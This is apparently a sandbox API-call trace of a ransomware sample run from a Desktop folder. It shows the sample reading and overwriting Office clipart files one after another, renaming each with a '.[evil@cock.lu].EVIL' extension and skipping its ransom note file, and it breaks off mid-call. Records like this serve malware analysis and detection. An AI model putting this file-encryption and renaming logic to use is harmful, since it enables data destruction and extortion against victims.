[0120.020] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 0x45 [0120.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.021] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2e0, lpOverlapped=0x0) returned 1 [0120.024] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.024] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.024] _errno () returned 0x84b1160840 [0120.024] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.024] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x300, lpOverlapped=0x0) returned 1 [0120.025] CloseHandle (hObject=0x1a8) returned 1 [0120.025] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.025] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.025] __uncaught_exception () returned 0x84b1160800 [0120.025] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.025] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf.[evil@cock.lu].evil")) returned 1 [0120.026] ??_V@YAXPEAX@Z () returned 0x1 [0120.028] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", dwFileAttributes=0x200) returned 0 [0120.029] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.029] wcsstr (_Str="EN00397_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.029] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 69 [0120.029] wcscmp (_String1="EN00397_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.029] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00397_.WMF") returned 0x0 [0120.029] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 0x45 [0120.029] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.031] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x439c, lpOverlapped=0x0) returned 1 [0120.051] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.051] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.051] _errno () returned 0x84b1160840 [0120.051] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.051] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x43a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x43a0, lpOverlapped=0x0) returned 1 [0120.051] CloseHandle (hObject=0x1a8) returned 1 [0120.052] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.052] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.052] __uncaught_exception () returned 0x84b1160800 [0120.052] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.052] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf.[evil@cock.lu].evil")) returned 1 [0120.053] ??_V@YAXPEAX@Z () returned 0x1 [0120.057] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", dwFileAttributes=0x200) returned 0 [0120.057] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.057] wcsstr (_Str="EN00902_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.057] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 69 [0120.057] wcscmp (_String1="EN00902_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EN00902_.WMF") returned 0x0 [0120.057] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 0x45 [0120.057] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f08, lpOverlapped=0x0) returned 1 [0120.085] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.085] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.086] _errno () returned 0x84b1160840 [0120.086] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.086] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f20, lpOverlapped=0x0) returned 1 [0120.086] CloseHandle (hObject=0x1a8) returned 1 [0120.086] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.086] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.086] __uncaught_exception () returned 0x84b1160800 [0120.086] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.087] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf.[evil@cock.lu].evil")) returned 1 [0120.087] ??_V@YAXPEAX@Z () returned 0x1 [0120.091] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", dwFileAttributes=0x200) returned 0 [0120.091] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.091] wcsstr (_Str="EXPLR_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.091] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 69 [0120.091] wcscmp (_String1="EXPLR_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.091] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="EXPLR_01.MID") returned 0x0 [0120.091] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 0x45 [0120.091] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.093] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2942, lpOverlapped=0x0) returned 1 [0120.111] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.111] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.111] _errno () returned 0x84b1160840 [0120.111] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.111] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2960, lpOverlapped=0x0) returned 1 [0120.111] CloseHandle (hObject=0x1a8) returned 1 [0120.111] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.112] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.112] __uncaught_exception () returned 0x84b1160800 [0120.112] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.112] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid.[evil@cock.lu].evil")) returned 1 [0120.113] ??_V@YAXPEAX@Z () returned 0x1 [0120.116] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID", dwFileAttributes=0x200) returned 0 [0120.117] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.117] wcsstr (_Str="FALL_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.117] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 68 [0120.117] wcscmp (_String1="FALL_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.117] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FALL_01.MID") returned 0x0 [0120.117] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 0x44 [0120.117] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.119] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12ee, lpOverlapped=0x0) returned 1 [0120.143] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.143] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.143] _errno () returned 0x84b1160840 [0120.143] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.143] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1300, lpOverlapped=0x0) returned 1 [0120.143] CloseHandle (hObject=0x1a8) returned 1 [0120.144] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.144] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.144] __uncaught_exception () returned 0x84b1160800 [0120.144] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.144] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid.[evil@cock.lu].evil")) returned 1 [0120.145] ??_V@YAXPEAX@Z () returned 0x1 [0120.147] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID", dwFileAttributes=0x200) returned 0 [0120.147] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.147] wcsstr (_Str="FD00074_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.147] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 69 [0120.148] wcscmp (_String1="FD00074_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.148] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00074_.WMF") returned 0x0 [0120.148] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 0x45 [0120.148] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.150] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x45ba, lpOverlapped=0x0) returned 1 [0120.152] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.152] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.152] _errno () returned 0x84b1160840 [0120.152] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.152] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45c0, lpOverlapped=0x0) returned 1 [0120.152] CloseHandle (hObject=0x1a8) returned 1 [0120.152] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.153] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.153] __uncaught_exception () returned 0x84b1160800 [0120.153] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.153] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf.[evil@cock.lu].evil")) returned 1 [0120.153] ??_V@YAXPEAX@Z () returned 0x1 [0120.156] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF", dwFileAttributes=0x200) returned 0 [0120.156] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.156] wcsstr (_Str="FD00076_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.156] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 69 [0120.156] wcscmp (_String1="FD00076_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.156] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00076_.WMF") returned 0x0 [0120.156] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 0x45 [0120.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.158] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2eda, lpOverlapped=0x0) returned 1 [0120.160] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.160] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.160] _errno () returned 0x84b1160840 [0120.160] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.160] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x2ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ee0, lpOverlapped=0x0) returned 1 [0120.161] CloseHandle (hObject=0x1a8) returned 1 [0120.161] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.161] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.161] __uncaught_exception () returned 0x84b1160800 [0120.161] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.161] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf.[evil@cock.lu].evil")) returned 1 [0120.162] ??_V@YAXPEAX@Z () returned 0x1 [0120.164] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF", dwFileAttributes=0x200) returned 0 [0120.164] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.164] wcsstr (_Str="FD00077_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.164] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 69 [0120.164] wcscmp (_String1="FD00077_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.164] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00077_.WMF") returned 0x0 [0120.164] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 0x45 [0120.164] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.166] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7620, lpOverlapped=0x0) returned 1 [0120.168] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.168] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.168] _errno () returned 0x84b1160840 [0120.168] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.168] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7640, lpOverlapped=0x0) returned 1 [0120.169] CloseHandle (hObject=0x1a8) returned 1 [0120.169] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.169] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.169] __uncaught_exception () returned 0x84b1160800 [0120.169] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.169] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf.[evil@cock.lu].evil")) returned 1 [0120.170] ??_V@YAXPEAX@Z () returned 0x1 [0120.172] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF", dwFileAttributes=0x200) returned 0 [0120.172] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.172] wcsstr (_Str="FD00086_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.172] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 69 [0120.172] wcscmp (_String1="FD00086_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.172] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00086_.WMF") returned 0x0 [0120.172] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 0x45 [0120.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 